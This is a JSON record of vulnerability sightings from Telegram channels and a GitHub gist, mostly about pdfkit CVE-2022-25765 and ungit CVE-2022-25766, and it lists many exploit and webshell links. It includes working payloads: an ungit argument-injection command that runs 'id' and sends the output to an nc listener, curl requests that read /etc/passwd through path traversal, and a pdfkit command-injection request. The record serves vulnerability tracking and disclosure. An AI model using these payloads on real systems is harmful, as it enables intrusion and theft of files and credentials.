{"vulnerability": "cve-2022-2576", "sightings": [{"uuid": "bab29152-6ae0-4f5d-a556-0472a7fc385f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25768", "type": "seen", "source": "https://t.me/cvedetector/6032", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2022-25768 - Mautic Unrestricted Update Access Control Vulnerability ( privilege escalation )\", \n  \"Content\": \"CVE ID : CVE-2022-25768 \nPublished : Sept. 18, 2024, 9:15 p.m. | 37\u00a0minutes ago \nDescription : The logic in place to facilitate the update process via the user interface lacks access control to verify if permission exists to perform the tasks. Prior to this patch being applied it might be possible for an attacker to access the Mautic version number or to execute parts of the upgrade process without permission. As upgrading in the user interface is deprecated, this functionality is no longer required. \nSeverity: 7.0 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-19T00:17:01.000000Z"}, {"uuid": "1e760aff-236e-4309-81db-98820a3ec2ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3614", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-25765 pdfkit <0.8.6 command injection.\nURL\uff1ahttps://github.com/shamo0/PDFkit-CMD-Injection\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-21T14:30:47.000000Z"}, {"uuid": "312860af-b361-49f8-b3c8-e8a7046c834c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25766", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2364", "content": "#\u041f\u041e #CVE #POC\n\nungit RCE\nCVE-2022-25766\n\n\u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE) \u0447\u0435\u0440\u0435\u0437 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 /api/fetch. \u0423\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f (remote \u0438 ref) \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0435 git fetch. \u041f\u0443\u0442\u0435\u043c \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043f\u0446\u0438\u0439 git \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.\n\nPoC\n\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 ungit \u0438 \u0441\u043e\u0437\u0434\u0430\u0439\u0442\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\n\u0421\u043e\u0437\u0434\u0430\u0439\u0442\u0435 listener: nc -nvlp 8000\n\u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0435 \u044d\u0442\u0443 curl \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b id: curl -d '{\"path\":\"/home/ubuntu/poc/ungit\",\"remote\":\"--upload-pack=curl http://localhost:8000 --data \\\"$(id)\\\"\",\"ref\":\"foobar\",\"socketId\":1}' -H \"Content-Type: application/json\" -X POST http://localhost:8448/api/fetch", "creation_timestamp": "2022-08-25T19:00:05.000000Z"}, {"uuid": "c05db7e1-ab7b-456b-84d4-7940f0921fb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3527", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1apdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765\nURL\uff1ahttps://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-04T21:05:25.000000Z"}, {"uuid": "a4e3638f-5c4c-4b04-8e2b-03b31fd3e222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/simosaper/748", "content": "#exploit\n1. CVE-2022-26265:\nContao CMS v.1.5.0 - RCE\nhttps://github.com/Inplex-sys/CVE-2022-26265\n\n2. CVE-2022-25765:\npdfkit URL Command Injection\nhttps://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795\n]-> A Shell exploit: https://github.com/Atsukoro1/PDFKitExploit", "creation_timestamp": "2022-12-06T06:38:55.000000Z"}, {"uuid": "c0d7558d-56b5-44a6-a16d-93a223488a74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/1287", "content": "\u200b\u200bCVE-2022-25765\n\nExploit for CVE-2022-25765 command injection in pdfkit < 0.8.6\n\nhttps://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765\n\n#cve #poc #exploit", "creation_timestamp": "2023-01-30T22:53:50.000000Z"}, {"uuid": "8c7351fc-42cb-4c72-bc9b-b4398d9d9bd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/BABATATASASA/3436", "content": "\u200b\u200bCVE-2022-25765 \n\npdfkit Exploit Reverse Shell\n\npdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765\n\nhttps://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell\n\n\u200b\u200bCVE-2022-45025\n\nCommand injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)\n\nhttps://github.com/yuriisanin/CVE-2022-45025\n\n\u200b\u200bCVE-2022-36537\n\nZK Framework - Exposure of Sensitive Information to an Unauthorized Actor\n\nhttps://github.com/agnihackers/CVE-2022-36537-EXPLOIT\n\n\u200b\u200bCVE-2022-39066\n\nSQL Injection Vulnerability in ZTE MF286R\n\nhttps://github.com/v0lp3/CVE-2022-39066\n\n\u200b\u200bCVE-2022-46381\n\nYou can scan this vulnerability on your company's subdomains using the nuclei scanner with the template specified in this repo \"CVE-2022-46381.yaml\"\n\nhttps://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-46381\n\n\u200b\u200bCVE-2022-45771 - Pwndoc LFI to RCE\n\nPwndoc local file inclusion to remote code execution of Node.js code on the server.\n\nhttps://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE\n\n\u200b\u200bCVE-2022-46169\n\nCacti remote_agent.php Unauthenticated Command Injection.\n\nhttps://github.com/0xf4n9x/CVE-2022-46169\n\n\u200b\u200bCVE-2022-45451\n\nPoC for CVE-2022-45451 Acronis Arbitrary File Read\n\nhttps://github.com/alfarom256/CVE-2022-45451\n\nCVE-2022-28672\n\nThis bug was Use after Free caused by improper handling of javascript object memory references.\n\nhttps://github.com/hacksysteam/CVE-2022-28672\n\nUse after Free - RCE Exploit: https://hacksys.io/blogs/foxit-reader-uaf-rce-jit-spraying-cve-2022-28672\n\n\u200b\u200bCVE-2003-0358\n\nBuffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges > via a long -s command line option.\n\nhttps://github.com/snowcra5h/CVE-2003-0358\n\n\u200b\u200bCVE-2022-39253\n\nDocker host file read\n\nhttps://github.com/ssst0n3/docker-cve-2022-39253-poc\n\n\u200b\u200bCVE-2022-48870\n\nmaccms admin+ xss attacks\n\nhttps://github.com/Cedric1314/CVE-2022-48870\n\n\u200b\u200bCVE-2022-2602\n\nPoC Kernel Privilege Escalation Linux\n\nhttps://github.com/kiks7/CVE-2022-2602-Kernel-Exploit\n\n\u200b\u200bEvilWfshbr\n\nCVE-2022-42046 Proof of Concept of wfshbr64.sys local privilege escalation\n\nhttps://github.com/kkent030315/CVE-2022-42046\n\n\u200b\u200bCVE-2022-2602\n\nThis repository contains exploits for CVE-2022-2602. There are two versions of it:\n\n\u25ab\ufe0f Exploit using userfaultfd technique.\n\u25ab\ufe0f Exploit using inode locking technique.\n\nhttps://github.com/LukeGix/CVE-2022-2602\n\n#cve #poc \n@pfkgit", "creation_timestamp": "2023-01-28T19:14:38.000000Z"}, {"uuid": "2407c927-0628-4ff9-a226-44ed9f0cfd3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "Telegram/Jlnijv-_qCNdG8pk9ZaWqsDMPV8FiAY7bukyinbc-jdofzA", "content": "", "creation_timestamp": "2023-03-14T10:12:05.000000Z"}, {"uuid": "fefb9a81-902d-4895-8c1c-a3a3c870e40c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "seen", "source": "https://t.me/proxy_bar/1347", "content": "CVE-2022-25765  -  PDFkit-CMD-Injection\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0434\u044b\u0440\u043a\u0438 \u0442\u0443\u0442\nexploit\n\n#exploit", "creation_timestamp": "2023-01-31T05:59:59.000000Z"}, {"uuid": "cc55a23e-5769-48f3-ad80-fc4ae36c91ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1638", "content": "#exploit\n1. CVE-2022-26265:\nContao CMS v.1.5.0 - RCE\nhttps://github.com/Inplex-sys/CVE-2022-26265\n\n2. CVE-2022-25765:\npdfkit URL Command Injection\nhttps://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795\n]-> A Shell exploit: https://github.com/Atsukoro1/PDFKitExploit", "creation_timestamp": "2022-12-06T04:04:20.000000Z"}, {"uuid": "ecb933a4-dfd1-480d-8b85-f815c793c460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/2497", "content": "Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6\n\ndownload: https://system32.ink/news-feed/p/209/", "creation_timestamp": "2023-02-02T11:57:40.000000Z"}, {"uuid": "e61c7786-835a-432d-a471-b1ca3d5635e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-2576", "type": "seen", "source": "https://t.me/cibsecurity/47261", "content": "\u203c CVE-2022-2576 \u203c\n\nIn Eclipse Californium version 2.0.0 to 2.7.2 and 3.0.0-3.5.0 a DTLS resumption handshake falls back to a DTLS full handshake on a parameter mismatch without using a HelloVerifyRequest. Especially, if used with certificate based cipher suites, that results in message amplification (DDoS other peers) and high CPU load (DoS own peer). The misbehavior occurs only with DTLS_VERIFY_PEERS_ON_RESUMPTION_THRESHOLD values larger than 0.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-07-29T18:13:34.000000Z"}, {"uuid": "f9f0c5eb-a5d5-4edb-ad50-1e633014f6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25760", "type": "seen", "source": "https://t.me/cibsecurity/39137", "content": "\u203c CVE-2022-25760 \u203c\n\nAll versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-03-17T15:21:38.000000Z"}, {"uuid": "cb7594ca-3da8-40af-83c5-e417f2895847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25762", "type": "seen", "source": "https://t.me/cibsecurity/42604", "content": "\u203c CVE-2022-25762 \u203c\n\nIf a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause the a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently which could result in data being returned to the wrong use and/or other errors.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-13T12:26:42.000000Z"}, {"uuid": "4dd691a0-413f-4a26-8d18-a4bdf9807253", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7308", "content": "#exploit\n1. CVE-2022-26265:\nContao CMS v.1.5.0 - RCE\nhttps://github.com/Inplex-sys/CVE-2022-26265\n\n2. CVE-2022-25765:\npdfkit URL Command Injection\nhttps://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795\n]-> A Shell exploit: https://github.com/Atsukoro1/PDFKitExploit", "creation_timestamp": "2022-12-06T11:01:01.000000Z"}, {"uuid": "2a17a69b-d1b6-4109-8cd6-5fa51f9abec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2533", "content": "#CVE-2022\npdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765\n\nhttps://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell\n\n@BlueRedTeam", "creation_timestamp": "2022-12-23T06:45:41.000000Z"}, {"uuid": "3f678c83-0e34-4816-8678-251146470b26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "seen", "source": "https://t.me/BlueRedTeam/2556", "content": "#CVE-2022\n7-Zip CVE-2022-29072 Mitigation - CHM file - This script detects if the .chm file exists and removes it.\n\nhttps://github.com/Phantomiman/7-Zip.chm-mitigiation\n\n#CVE-2022\nPoC for Acronis Arbitrary File Read - CVE-2022-45451\nhttps://github.com/alfarom256/CVE-2022-45451\n\n#webshell\nwebshell alfa php\n\nhttps://github.com/xstro04002/alfa-shell\n\nCVE-2022-25765 pdfkit <0.8.6 command injection.\n\nhttps://github.com/shamo0/PDFkit-CMD-Injection\n\nGet root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple's XNU source.\n\nhttps://github.com/Conradoduart3/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft\n\n@BlueRedTeam", "creation_timestamp": "2023-01-10T19:38:54.000000Z"}, {"uuid": "44466181-93f4-4202-8f97-6f5bbfa0fcd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/680", "content": "cve-2022-25765\n\nGET   /?name=%20ls\n\n#poc", "creation_timestamp": "2023-07-02T13:30:24.000000Z"}, {"uuid": "8f3e4148-6eec-4ca3-82a3-3792dfc61132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25766", "type": "seen", "source": "https://gist.github.com/sandh0t/c90fa97b087db012f816b8cb67a68ff3", "content": "## Unauthenticated arbitrary file read in ungit via the /api/diff/image endpoint\n\n| | |\n|---|---|\n| **Package** | [`ungit`](https://www.npmjs.com/package/ungit) (npm) |\n| **Repository** | https://github.com/FredrikNoren/ungit |\n| **Affected** | All versions up to and including `1.5.30` (latest; commit `a7aeb74`, 2026-05-31) |\n| **Vulnerability** | Arbitrary File Read / Path Traversal |\n| **Authentication** | **None required** by default |\n| **CWE** | [CWE-22](https://cwe.mitre.org/data/definitions/22.html) / [CWE-23](https://cwe.mitre.org/data/definitions/23.html) \u2014 Improper Limitation of a Pathname to a Restricted Directory |\n| **Severity** | High (CVSS:3.1 `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` = **7.5**) |\n\n\n### Summary\n\nungit is a web-based UI for git. Its HTTP API exposes `GET /api/diff/image`, which serves a file built from two attacker-controlled query parameters (`path` and `filename`) with **no restriction to the repository working tree**. The endpoint is **unauthenticated by default**, so anyone who can reach the server can read arbitrary files from the host filesystem (e.g. `/etc/passwd`, SSH keys, application secrets) with the privileges of the ungit process.\n\n### Details\n\nThe route handler joins `req.query.path` and `req.query.filename` and passes the result straight to `res.sendFile()`:\n\n```js\nres.sendFile(path.join(req.query.path, req.query.filename));\n```\n\nBecause `path.join('/etc', 'passwd')` yields the absolute path `/etc/passwd`, an attacker fully controls which file is served. The two middlewares on the route do **not** prevent this:\n\n- `ensureAuthenticated` is a **no-op** by default \u2014 ungit ships with `config.authentication = false`, so the guard is replaced by `(req, res, next) => next()`.\n- `ensurePathExists` only runs `fs.access(req.query.path)` \u2014 a *directory-exists* check, **not** a traversal/containment guard. `/etc` exists, so the check passes.\n\nThere is no canonicalization, no `..` rejection, and no check that the resolved path stays within the served repository. The `version !== 'current'` branch (`gitPromise.binaryFileContent`) is similarly fed the attacker-controlled `path`/`filename`. The route is a `GET` with no Origin/CSRF check, so a localhost-only instance is additionally reachable via DNS-rebinding from a victim's browser.\n\n### PoC\n\n1. Install and start ungit in its default configuration\n\n   ```bash\n   npm install -g ungit\n   ungit --no-launchBrowser        # serves http://127.0.0.1:8448\n   ```\n\n\n2. As an unauthenticated attacker, request any absolute path. using below request:\n\n   ```bash\n   curl 'http://127.0.0.1:8448/api/diff/image?path=/etc&filename=passwd&version=current'\n   ```\n\n3. Observe the contents of an arbitrary host file in the response:\n\n   ```\n   % curl 'http://127.0.0.1:8448/api/diff/image?path=/etc&filename=passwd&version=current'\n   root:x:0:0:root:/root:/bin/bash\n   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n   bin:x:2:2:bin:/bin:/usr/sbin/nologin\n   ...\n   ```\n\n\n4 **Raw HTTP request** (Burp Repeater):\n  ```http\n  GET /api/diff/image?path=/etc&filename=passwd&version=current HTTP/1.1\n  Host: TARGET:8448\n  Accept: */*\n  Connection: close\n\n\n  ```\n\n\n### Vulnerable code\n\n`source/git-api.js`:\n\n```js\n// :21 \u2014 auth guard is a pass-through unless authentication is enabled (default: off)\nconst ensureAuthenticated = env.ensureAuthenticated || ((req, res, next) => next());\n\n// :162 \u2014 \"path exists\" check only; NOT a traversal/containment guard\nconst ensurePathExists = (req, res, next) => {\n  fs.access(req.query.path || req.body.path)\n    .then(() => { next(); })\n    .catch(() => {\n      res.status(400).json({ error: `'No such path: ${path}`, errorCode: 'no-such-path' });\n    });\n};\n\n// :368 \u2014 both guards are ineffective; path+filename are attacker-controlled\napp.get(`${exports.pathPrefix}/diff/image`, ensureAuthenticated, ensurePathExists, (req, res) => {\n  res.type(path.extname(req.query.filename));\n  if (req.query.version !== 'current') {\n    gitPromise.binaryFileContent(req.query.path, req.query.filename, req.query.version, res); // also attacker-pathed\n  } else {\n    res.sendFile(path.join(req.query.path, req.query.filename));   // <-- arbitrary file read, no root restriction\n  }\n});\n```\n\n### Impact\n\n**Unauthenticated arbitrary file read.** Any party able to reach the ungit HTTP port can read any file the ungit process can access \u2014 system files (`/etc/passwd`, `/etc/shadow` if run as root), SSH private keys, cloud credentials, `.env`/config secrets, and source code. ungit is a developer tool frequently run on workstations and CI hosts; on a localhost-only install the same read is reachable via DNS-rebinding from a malicious web page. The leaked material (keys/tokens) commonly enables follow-on compromise.\n\n### Remediation\n\n- **Confine the served path to the repository working tree.** Resolve the join, `realpath` it, and verify it stays inside the repo root before serving:\n- **Reject path-traversal input** \u2014 deny absolute `filename` values and any segment containing `..`.\n- **Add an Origin/Host allowlist (anti-DNS-rebinding)** for the API, since these are `GET`s with no CSRF protection, and consider enabling authentication by default.\n\n### References\n\n- CWE-22: https://cwe.mitre.org/data/definitions/22.html\n- OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal\n- Express `res.sendFile` (use the `root` option to confine): https://expressjs.com/en/api.html#res.sendFile\n- DNS rebinding attacks: https://en.wikipedia.org/wiki/DNS_rebinding\n- Existing (unrelated) ungit advisory \u2014 CVE-2022-25766 (argument-injection RCE): https://github.com/advisories/GHSA-hf8c-xr89-vfm5\n\n### Author\n\nAyoub Safa ([@sandh0t](https://github.com/sandh0t))", "creation_timestamp": "2026-06-14T13:12:45.000000Z"}, {"uuid": "faa2c816-a451-4012-9b11-4fe050facea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7652", "content": "#exploit\n1. CVE-2022-44900:\nDirectory traversal vulnerability in SevenZipFile.extractall() function\nhttps://github.com/0xless/CVE-2022-44900-demo-lab\n\n2. CVE-2022-25765:\nPDFkit CMD Injection\nhttps://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765", "creation_timestamp": "2023-01-30T12:34:25.000000Z"}, {"uuid": "9ff000c3-9289-4132-bac8-590d5afc9486", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4604", "content": "PDFkit CMD-Injection (CVE-2022-25765)\n\nExploit\n\n#CVE #POC #Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:25:57.000000Z"}, {"uuid": "83a92042-9b2a-4e13-be7d-d42cbdf9bb47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "seen", "source": "https://t.me/GithubRedTeam/86709", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2022-25765-exploit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Jeanback1\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-31 16:05:58\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-31T16:06:40.000000Z"}, {"uuid": "0fd66021-7ea2-4c71-bc79-5d4e484fea36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "seen", "source": "Telegram/ZoY6dRqoyhlR4mBfSRB4aFzKbPGG5Dw602ZRl8-Iopy1ppw", "content": "", "creation_timestamp": "2026-05-31T19:00:11.000000Z"}]}